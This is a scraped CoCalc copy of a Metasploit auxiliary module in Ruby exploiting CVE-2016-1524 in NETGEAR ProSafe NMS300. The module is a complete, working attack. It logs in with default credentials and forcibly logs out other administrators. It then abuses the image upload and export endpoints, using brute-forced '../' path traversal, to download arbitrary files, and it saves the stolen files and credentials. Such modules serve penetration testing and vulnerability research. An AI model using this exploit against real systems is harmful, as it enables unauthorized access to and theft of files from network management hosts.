CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/admin/http/netgear_auth_download.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Exploit::Remote::HttpClient89def initialize(info = {})10super(11update_info(12info,13'Name' => 'NETGEAR ProSafe Network Management System 300 Authenticated File Download',14'Description' => %q{15Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.16The application has a file download vulnerability that can be exploited by an17authenticated remote attacker to download any file in the system.18This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.19},20'Author' => [21'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module22],23'License' => MSF_LICENSE,24'References' => [25['CVE', '2016-1524'],26['US-CERT-VU', '777024'],27['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],28['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30']29],30'DisclosureDate' => '2016-02-04'31)32)3334register_options(35[36Opt::RPORT(8080),37OptString.new('TARGETURI', [true, 'Application path', '/']),38OptString.new('USERNAME', [true, 'The username to login as', 'admin']),39OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),40OptString.new('FILEPATH', [false, 'Path of the file to download minus the drive letter', '/Windows/System32/calc.exe']),41]42)4344register_advanced_options(45[46OptInt.new('DEPTH', [false, 'Max depth to traverse', 15])47]48)49end5051def authenticate52res = send_request_cgi({53'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do'),54'method' => 'POST',55'vars_post' => {56'userName' => datastore['USERNAME'],57'password' => datastore['PASSWORD']58},59'vars_get' => { 'method' => 'login' }60})6162if res && res.code == 20063cookie = res.get_cookies64if res.body.to_s =~ /"loginOther":true/ && res.body.to_s =~ /"singleId":"([A-Z0-9]*)"/65# another admin is logged in, let's kick him out66res = send_request_cgi({67'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do'),68'method' => 'POST',69'cookie' => cookie,70'vars_post' => { 'singleId' => ::Regexp.last_match(1) },71'vars_get' => { 'method' => 'loginAgain' }72})73if res && res.code == 200 && (res.body.to_s !~ /"success":true/)74return nil75end76end77return cookie78end79return nil80end8182def download_file(download_path, cookie)83filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.img'84begin85res = send_request_cgi({86'method' => 'POST',87'cookie' => cookie,88'uri' => normalize_uri(datastore['TARGETURI'], 'data', 'config', 'image.do'),89'vars_get' => {90'method' => 'add'91},92'vars_post' => {93'realName' => download_path,94'md5' => '',95'fileName' => filename,96'version' => Rex::Text.rand_text_alphanumeric(rand(8..9)),97'vendor' => Rex::Text.rand_text_alphanumeric(rand(4..6)),98'deviceType' => rand(999),99'deviceModel' => Rex::Text.rand_text_alphanumeric(rand(5..7)),100'description' => Rex::Text.rand_text_alphanumeric(rand(8..17))101}102})103104if res && res.code == 200 && res.body.to_s =~ /"success":true/105res = send_request_cgi({106'method' => 'POST',107'cookie' => cookie,108'uri' => normalize_uri(datastore['TARGETURI'], 'data', 'getPage.do'),109'vars_get' => {110'method' => 'getPageList',111'type' => 'configImgManager'112},113'vars_post' => {114'everyPage' => rand(500..1498)115}116})117118if res && res.code == 200 && res.body.to_s =~ /"imageId":"([0-9]*)","fileName":"#{filename}"/119image_id = ::Regexp.last_match(1)120return send_request_cgi({121'uri' => normalize_uri(datastore['TARGETURI'], 'data', 'config', 'image.do'),122'method' => 'GET',123'cookie' => cookie,124'vars_get' => {125'method' => 'export',126'imageId' => image_id127}128})129end130end131return nil132rescue Rex::ConnectionRefused133print_error("#{peer} - Could not connect.")134return135end136end137138def save_file(filedata)139vprint_line(filedata.to_s)140fname = File.basename(datastore['FILEPATH'])141142path = store_loot(143'netgear.http',144'application/octet-stream',145datastore['RHOST'],146filedata,147fname148)149print_good("File saved in: #{path}")150end151152def run153cookie = authenticate154if cookie.nil?155fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")156else157print_good("#{peer} - Logged in with #{datastore['USERNAME']}:#{datastore['PASSWORD']} successfully.")158store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'], proof: cookie) # more consistent service_name and protocol159end160161if datastore['FILEPATH'].blank?162fail_with(Failure::Unknown, "#{peer} - Please supply the path of the file you want to download.")163return164end165166filepath = datastore['FILEPATH']167res = download_file(filepath, cookie)168if res && res.code == 200 && (res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/))169save_file(res.body)170return171end172173print_error("#{peer} - File not found, using bruteforce to attempt to download the file")174count = 1175while count < datastore['DEPTH']176res = download_file(('../' * count).chomp('/') + filepath, cookie)177if res && res.code == 200 && (res.body.to_s.bytesize != 0 && (res.body.to_s !~ /This file does not exist./) && (res.body.to_s !~ /operation is failed/))178save_file(res.body)179return180end181count += 1182end183184print_error("#{peer} - Failed to download file.")185end186end187188189